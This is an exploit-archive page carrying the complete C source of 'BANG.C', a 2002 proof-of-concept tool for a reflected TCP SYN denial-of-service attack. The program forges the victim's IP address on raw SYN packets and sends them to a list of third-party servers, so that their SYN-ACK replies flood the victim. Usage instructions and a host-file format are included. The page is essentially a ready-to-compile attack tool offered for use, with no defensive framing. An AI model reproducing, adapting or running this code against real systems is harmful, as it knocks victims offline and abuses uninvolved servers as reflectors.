header-logo
Suggest Exploit
vendor:
by:
Sorcerer of DALnet
7.5
CVSS
HIGH
DoS
CWE
Product Name:
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

REDIRECTION DOS FINALLY DISTRIBUTED !!!!!

This is POC and demonstrates a new method of DoS. The idea behind it is that the attacker generates connection requests to a list of hosts which have a TCP service running such as http (80), telnet (23) etc. from the ip of the victim host. This will result all of the hosts that the victim requested connections to send back packets (usually SYN-ACK's) 2-3 of them (amplification comes here!) causing load to the victim by cauzing the victim to send RST packets since it never actually requested any such connection. This attack is dangerous since its almost impossible to filter!!

Mitigation:

Unknown
Source

Exploit-DB raw data:

/* 
 * BANG.C Coded by Sorcerer of DALnet
 *
 * FUCKZ to: etech, blazin, udp, hybrid and kdl
 * PROPZ : skrilla, thanks for all your help with JUNO-Z and especially this code :)
 *             -------------------------------- 
 * REDIRECTION DOS FINALLY DISTRIBUTED !!!!!!
 *
 * This is POC and demonstrates a new method of DoS. The idea
 * behind it is that the attacker generates connection requests
 * to a list of hosts which have a TCP service running such as
 * http (80), telnet (23) etc. from the ip of the victim host.
 * This will result all of the hosts that the victim *requested*
 * connections to send back packets (usually SYN-ACK's) 2-3 of
 * them (amplification comes here!) causing load to the victim
 * by cauzing the victim to send RST packets since it never actually
 * requested any such connection. This attack is dangerous since
 * its almost impossible to filter!!
 *
 * hosts file should be in the format of 1 ip:port per line
 * i.e. 194.66.25.97:80
 *      130.88.172.194:23
 *      65.161.42.42:6667
 * NOTE: target should only be ip, and all the hosts on the list should
 * also be ips thats for speed issues.
 * 
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>

#define __FAVOR_BSD

#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>


unsigned short int getrandportid(void);
unsigned short in_cksum(u_short *addr, int len);
short int send_syn(unsigned long int , unsigned long int, unsigned short int);
int sox;

struct pseudo {
  unsigned long srca, dsta;
  unsigned char zero, proto;
  unsigned short tcplen;
};

struct checksum {
  struct pseudo pp;
  struct tcphdr tt;
};

/* Taken out since only works on x86 and rdtsc is also only pentium specific */
#if 0
/* Thanks to skrilla :) */
unsigned short mktcpsum1(struct packet *p,int len) {
  unsigned short old_sum = p->tcpsum;
  unsigned long s = (unsigned long)&p->sport;
  unsigned long sum = ((p->src >> 16) + (p->src & 0xffff) + (p->dst >> 16) +
		       (p->dst & 0xffff) + (__htons__(6) + __htons__(len-20)));
  
  p->tcpsum=0;
  __asm__ __volatile__ (
			/*"xorl %%eax,%%eax;"
			  "cmpl $2,%%ecx;"
			  "jb 1f;"
			  "0:;"
			  "lodsw;"
			  "addw %%ax,%%dx;"
			  "jnc 9f;"
			  "addl $65536,%%edx;"
			  "9:;"
			  "decl %%ecx;"
			  "loop 0b;"
			  "1:;"
			  "orb %%cl,%%cl;"
			  "jz 2f;"
			  "xorw %%ax,%%ax;"
			  "lodsb;"
			  "addw %%ax,%%dx;"
			  "jnz 2f;"
			  "addl $65536,%%edx;"
			  "2:;"
			  "movw %%dx,%%ax;"
			  "shrl $16,%%edx;"
			  "addw %%ax,%%dx;"
			  "adcl $0xffff0000,%%edx;"
			  "xorw $65535,%%dx;"*/
			
			"movw %%dx,%%ax;"
			"shrl $16,%%edx;"
			"addw %%ax,%%dx;"
			"adcw $0,%%dx;"
			
			"testl $1,%%ecx;"
			"jz 0f;"
			"xorw %%ax,%%ax;"
			"lodsb;"
			"addw %%ax,%%dx;"
			"adcw $0,%%dx;"
			"0:;"
			"shrl $1,%%ecx;"
			"1:;"
			"lodsw;"
			"addw %%ax,%%dx;"
			"adcw $0,%%dx;"
			"loop 1b;"
			"andl $65535,%%edx;"
			"xorw $65535,%%dx;"
			
			:"=edx"(sum):"edx"(sum),"ecx"(len-20),"S"(&p->sport):"eax");
  p->tcpsum=old_sum;
  return(sum);
}

unsigned long long int
rdtsc(void) {
  unsigned long long int tsc;
  unsigned long int tsc_l,tsc_h;
  __asm__ volatile("rdtsc":"=%eax"(tsc_l),"=d"(tsc_h));
  tsc=tsc_h;
  tsc=(tsc<<32)|tsc_l;
  return(tsc);
}
#endif

int
main(int argc, char **argv)
{
  int                 enable=1,tmp,tmp2, loop, count=0;
  char               *lala, *tmp1, buf[25];
  unsigned long int   ip[1000000], src;
  unsigned short int  port[1000000];
  FILE               *fp;
  struct timeval      start, end;

  printf("\nCoded by Sorcerer of DALnet\n\n");
  
  if(argc != 4){
    fprintf(stderr, "Incorrect usage try: %s <victim> <host-file> <loop host-file>\a\n", *argv);
    fprintf(stderr, "Example:             %s 127.0.0.1 myhostsfile.txt 3\n\n", *argv);
    return(-1);
  }
  
  fp = fopen(argv[2], "r");
  if(fp == NULL){
    fprintf(stderr, "Error while opening: %s\n", argv[2]);
    perror("fopen");
    return(-1);
  }
  
  loop = atoi(argv[3]);
  if(loop == 0){
    fprintf(stderr, "Cannot loop 0 times you need to loop at least once\n");
    return(-1);
  }
  
  for(tmp=0;tmp<=1000000;tmp++){
    ip[tmp] = htons(23);
    port[tmp] = htons(23);
  }

  sox = socket(PF_INET, SOCK_RAW, 6);
  if(sox == -1){ perror("socket"); return(-1); }
  
  tmp = setsockopt(sox, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable));
  if(tmp == -1){ perror("setsockopt"); return(-1); }

    
  printf("Reading ips on memory and reconstructing in network byte order...\n"); fflush(stdout);
  
  while(1){
    memset(buf, 0, 25);

    tmp1 = fgets(buf, 25, fp);
    if(tmp1 == NULL) break;
    
    if(strlen(buf) < 9) {
      printf("Bogus entry: %s\n", buf);
      continue;
    }
    
    lala = strchr((char *)&buf, ':');

    port[count] = htons(atoi(++lala));

    buf[strlen(buf)-strlen(lala)-1] = '\0';

    ip[count] = inet_addr(buf);

    count++;
    printf("."); fflush(stdout);
  }

  printf("Done.\n");

  src = inet_addr(argv[1]);

  tmp = gettimeofday((struct timeval *)&start, NULL);
  if(tmp == -1){ perror("gettimeofday"); return(-1); }
  

  for(tmp2=0;tmp2<loop;tmp2++)
    for(tmp=0;tmp<count;tmp++)
      send_syn(src, ip[tmp], port[tmp]);
  

  tmp = gettimeofday((struct timeval *)&end, NULL);
  if(tmp == -1){ perror("gettimeofday"); return(-1); }
  
  printf("\nTotal time taken: %lu\nBytes sent: %d\n", (end.tv_sec+end.tv_usec)-(start.tv_sec+start.tv_usec), count*loop*sizeof(char)*sizeof(struct ip)*sizeof(struct tcphdr));
  
  return 0;
}

short int
send_syn(unsigned long int src, unsigned long int dst, unsigned short int port)
{
  struct sockaddr_in  s;
  struct ip           *i;
  struct tcphdr       *t;
  struct pseudo       p;
  struct checksum     c;
  char                packet[sizeof(char)*(sizeof(struct ip)+sizeof(struct tcphdr))];
  int                 tmp;

  s.sin_family       = PF_INET;
  s.sin_port         = port;
  s.sin_addr.s_addr  = dst;
 
  i = (struct ip *)&packet;
  t = (struct tcphdr *)((int)i+sizeof(struct ip));

  memset(&packet, 0, sizeof(packet));

  i->ip_hl         = 5;
  i->ip_v          = 4;
  i->ip_tos        = 0x08;
  i->ip_len        = htons(sizeof(packet));
  i->ip_id         = htons(getrandportid());
  i->ip_off        = 0;
  i->ip_ttl        = 255;
  i->ip_p          = 6;
  i->ip_sum        = 0;
  i->ip_src.s_addr = src;
  i->ip_dst.s_addr = dst;


  t->th_sport = htons(getrandportid());
  t->th_dport = port;
  t->th_seq   = htons(getrandportid());
  t->th_ack   = 0;
  t->th_x2    = 0;
  t->th_off   = 5;
  t->th_flags = 0x02;
  t->th_win   = 65535;
  t->th_urp   = 0;
  t->th_sum   = 0;

  p.srca      = src;
  p.dsta      = dst;
  p.proto     = 6;
  p.tcplen    = htons(sizeof(struct tcphdr));
  p.zero      = 0;
  
  memcpy(&c.pp, &p, sizeof(p));
  memcpy(&c.tt, t, sizeof(struct tcphdr));

  t->th_sum    = in_cksum((void *)&c, sizeof(c));

  tmp = sendto(sox, packet, ntohs(i->ip_len), MSG_DONTWAIT, (struct sockaddr *)&s, sizeof(s));
  if(tmp == -1){
    perror("sendto");
    return(-1);
  }

  return 0;
}

unsigned short int
getrandportid(void)
{
  unsigned short int port;
  struct timeval tv;

  gettimeofday((struct timeval *)&tv, NULL);
  srand(tv.tv_sec+tv.tv_usec);

  port = rand()+1;

  return(port);
}


/* Slow shit checksum function from RFC */
u_short 
in_cksum(u_short *addr, int len)
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;
  
  while (nleft > 1)  {
    sum += *w++;
    nleft -= 2;
  }
  
  
  if (nleft == 1) {
    *(u_char *)(&answer) = *(u_char *) w;
    sum += answer;
  }
  
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return(answer);
}

// milw0rm.com [2002-09-17]